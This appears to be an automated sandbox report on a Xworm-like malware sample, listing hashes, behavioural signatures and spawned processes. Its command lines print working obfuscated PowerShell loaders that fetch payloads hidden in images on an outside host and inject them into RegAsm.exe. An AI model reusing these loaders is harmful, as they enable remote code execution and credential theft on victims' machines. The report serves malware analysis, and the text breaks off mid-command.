C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 98b3cefae98c43beef4a78853ddf828f |
| SHA1 | c9f605f6e03efbb1d0c6e2c2a6c5fc4e4cb33f22 |
| SHA256 | e2c0d8d81642c916bac98d868c60c0463e94ca19eaf510204a722f6bd1ff31cc |
| SHA512 | b817c9034f1fa1399454018fff0cf9c4afd5317c1f1141bb92d60d5119e2ce1952023fcf23d280656f90b0d00c3cb3ed2a4b286298f1e0355b9ed9ca44213664 |
C:\Users\Admin\AppData\Local\Temp\CabDF96.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 57b726b7b58c3113130090c4ed133914 |
| SHA1 | 39e1c62d6aab2b4ed8bc0a8ec73d8d7cba0092cf |
| SHA256 | 27c04e31958c9ce6ca29c24c23c9c4b4f1eba36dd76f05fbba9c6b55f755b929 |
| SHA512 | 4cebd95d9088b18862579f228bb6f04882ff6bcc05a899bccf222b5241212d1074b626f66d2f80df5701d8f2e61bc648adbc03c6d4f2e3b920f5046121262e2b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | c42f588bacba12518d4ecd146f1ea61e |
| SHA1 | b7942f766e3f44d92e16767112ecf6468b8ff557 |
| SHA256 | f574a852f45ed0178441c54e44473f8fe9881fe432e98d64cf883302cd2c0280 |
| SHA512 | 6a422edd4911a63b1963d31573e6394c55aa6baa25e888e926f5316627776680647121ab3812913c5d0efe91edec4c7c317b8458d9f1845034993b4dbffb1e8f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 70a068eb8a8c072c189fe725306f54bd |
| SHA1 | 7ef33e111e12530874f553efa07a8a1dac72263a |
| SHA256 | 95501b01d3262b056de3c9c0710d9e3f6eed83d6adba057932ca3f82853fcc6d |
| SHA512 | 4696a14e87431c3bc6c1f92b10c94f3da6f0dd58d8fcf70febd178329d96f499eaf49686b211921c6ff96a37d29c9d9e07ea6e29fdcfc271c3d1a64158c7ec4a |
memory/1348-57-0x0000000002790000-0x0000000002798000-memory.dmp
memory/1348-56-0x000000001B510000-0x000000001B7F2000-memory.dmp
memory/2908-73-0x000000001AC80000-0x000000001AE6E000-memory.dmp
memory/2008-74-0x000007FEF6000000-0x000007FEF69EC000-memory.dmp
memory/1576-80-0x000000001B610000-0x000000001B8F2000-memory.dmp
memory/1576-81-0x0000000002240000-0x0000000002248000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 21:22
Reported
2024-06-13 22:33
Platform
win10-20240404-en
Max time kernel
1326s
Max time network
1800s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Datakopierings = "%Revolutionary% -w 1 $Nonetheless=(Get-ItemProperty -Path 'HKCU:\\Cornaceous\\').Gonid;%Revolutionary% ($Nonetheless)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4012 set thread context of 3328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3988 set thread context of 198380 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\junexw.exe
"C:\Users\Admin\AppData\Local\Temp\junexw.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\zxwuch.vbe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\kaqlax.js"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ucaxju.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreMwDgTrevDgTreDUDgTreNwDgTre4DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDcDgTreNgDgTre3DgTreDEDgTreODgTreDgTre0DgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreMwDgTrevDgTreDUDgTreNwDgTre4DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDcDgTreNgDgTre3DgTreDEDgTreODgTreDgTre0DgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBSDgTreHUDgTrebgBQDgTreEUDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBuDgTreHUDgTreagBuDgTreGUDgTrecwBhDgTreC8DgTrebQBvDgTreGMDgTreLgBpDgTreGMDgTreaQByDgTreGEDgTreawBpDgTreGMDgTreZQBrDgTreGUDgTrebDgTreBvDgTreGoDgTreZQBpDgTreHYDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2JywgJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2Jyk7ICRpbWFnZUJ5dGVzID0gRG93bmxvYWREYXRhRnJvbUxpbmtzICRsaW5rczsgaWYgKCRpbWFnZUJ5dGVzIC1uZSAkbnVsbCkgeyAkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGltYWdlQnl0ZXMpOyAkc3RhcnRGbGFnID0gJzw8QkFTRTY0X1NUQVJUPj4nOyAkZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7ICRzdGFydEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRzdGFydEZsYWcpOyAkZW5kSW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJGVuZEZsYWcpOyBpZiAoJHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAkZW5kSW5kZXggLWd0ICRzdGFydEluZGV4KSB7ICRzdGFydEluZGV4ICs9ICRzdGFydEZsYWcuTGVuZ3RoOyAkYmFzZTY0TGVuZ3RoID0gJGVuZEluZGV4IC0gJHN0YXJ0SW5kZXg7ICRiYXNlNjRDb21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJpbmcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpOyAkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYmFzZTY0Q29tbWFuZCk7ICRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGNvbW1hbmRCeXRlcyk7ICR0eXBlID0gJGxvYWRlZEFzc2VtYmx5LkdldFR5cGUoJ1J1blBFLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LndlbnlhbW52aC9sYy5zYXlvanJldmVsYy8vOnNwdHRoJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJywnUmVnQXNtJywnZGVzYXRpdmFkbycpKX19';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/793/578/original/vbs.jpg?1717671844', 'https://uploaddeimagens.com.br/images/004/793/578/original/vbs.jpg?1717671844'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.nujnesa/moc.icirakicekelojeiv//:sptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216', 'https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = 